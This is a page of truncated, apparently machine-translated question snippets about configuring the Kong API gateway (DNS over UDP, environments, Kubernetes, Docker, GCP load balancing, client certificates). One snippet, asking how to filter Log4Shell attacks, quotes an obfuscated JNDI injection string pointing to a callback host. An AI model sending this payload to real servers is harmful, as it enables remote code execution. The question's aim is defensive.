我需要根据主机名代理 DNS 请求。 我已将 Kong 配置为流式传输 53 udp。 我可以创建服务: curl -X POST http://localhost:8001/services \ -H "Content-Type: application/json" \ -d '{"name":"jerry", "protocol":"udp", "host": "jerry-coredns", "port": 53}' 但是当尝试根据主机名创建路由时: curl -X POST http://localhost:8001/services/jerry...
我在 Google 上搜索了许多不同的术语组合,以找出 Kong Konnect 希望系统管理员使用哪些概念和功能来表示不同的环境(例如分阶段、生产)和租户(例如美国、加拿大),但无济于事。 我能找到的唯一文档(来自 Kong 自己)建议使用多个运行时组,但这需要企业订阅;考虑到这种环境分离是许多公司(无论大小)都采用的非常常见的模式,因此这对我来说似乎是小事一桩。 我能看到的唯一其他方法是避免在服务中心关联上游 URL,而是利用每个环境一个网关服务(例如public-api-staging,public-api-production)在单个运行时组内,以及...
我们需要一些帮助来尝试在 Jelastic 环境内的 Kubernetes 中安装 Kong。我和我的同事有一个基于生产的 kubernetes 集群,其中包含以下内容: 负载均衡器 1 个具有公共 IP 的节点 工人 2 个节点 贮存 3 个具有 NFS 存储的节点 控制平面 3 个节点 默认情况下,此环境可以很好地ingress-nginx加载Hello Kuberenetes应用程序。以下是 ingress-nginx hello kubernetes 示例的配置: apiVersion: networking.k8s.i...
我正在使用带有 Compose 的 docker 并创建了一些微服务,并尝试通过 Kong Gateway 连接它们。 为了使用 PHP 访问 MS,我在 Nginx 中创建了反向代理,我可以通过以下 URL 示例进行访问: http://service1.localhost:8081 (Laravel with PHP MS) http://service2.localhost:8081 (Laravel with PHP MS) http://service3.localhost:8081 (Laravel with PHP MS) http://fr...
我正在使用香港反向代理代理我的 Web 服务器的每个 HTTP 请求。我想缓解当前的 log4j 问题 ("log4shell通过查找并替换关键攻击者的字符串(如“jndi”),我能够轻松找到问题根源。例如,我在日志中发现了以下内容: ${jndi:${lower:l}${lower:d}a${lower:p}://xxx.log4j.bin${upper:a}xxx.xx:80/callback} 我认为这可以通过使用请求转换器插件。有人已经这样做了吗? PS:仅仅jndi用 来替换disabled太过深远而且会破坏很多东西。 ...
我正在尝试向端点发送请求/v1/resource,但收到以下错误: 2021/06/02 23:17:17 [crit] 30#0: *2963 connect() failed (101: Network unreachable), context: ngx.timer, client: 172.13.0.21, server: 0.0.0.0:8443 2021/06/02 23:17:18 [crit] 30#0: *2969 connect() failed (101: Network unreachable), context: ngx.timer...
我试图弄清楚如何在 GCP 中将 TCP 负载均衡器与 HTTP/HTTPS 负载均衡器连接起来。 我已经在 GKE 集群上安装了 kong,它创建了一个 TCP 负载均衡器。 现在,如果我有多个带有 Kong 的 GKE 集群,它们都将拥有自己的 TCP 负载均衡器。 从用户的角度来看,我需要进行 DNS 负载平衡,但这并不总是有成效的。 因此,我试图弄清楚是否可以使用 Cloud CDN、NEG 和/或 HTTP/HTTPS 负载均衡器作为 Kong 的 TCP 负载均衡器的前端。 有可能吗?还有其他选择吗? ...
我们已设置 Kong API 网关(在后台运行 NGINX),其中一个上游是 apache 服务器,我们想要在其上进行客户端证书验证。 我正在运行测试,curl我请求 kong(nginx),他将请求转发给 apache。我正在使用curl --cert cert.crt --key key.key "https://kongurl.com/blabla" 在 nginx 端,我设置了一个自定义日志来查看证书(至少是序列号)是否正在发送,并且我可以看到它: log_format combined_sslclient '$remote_addr - $remo...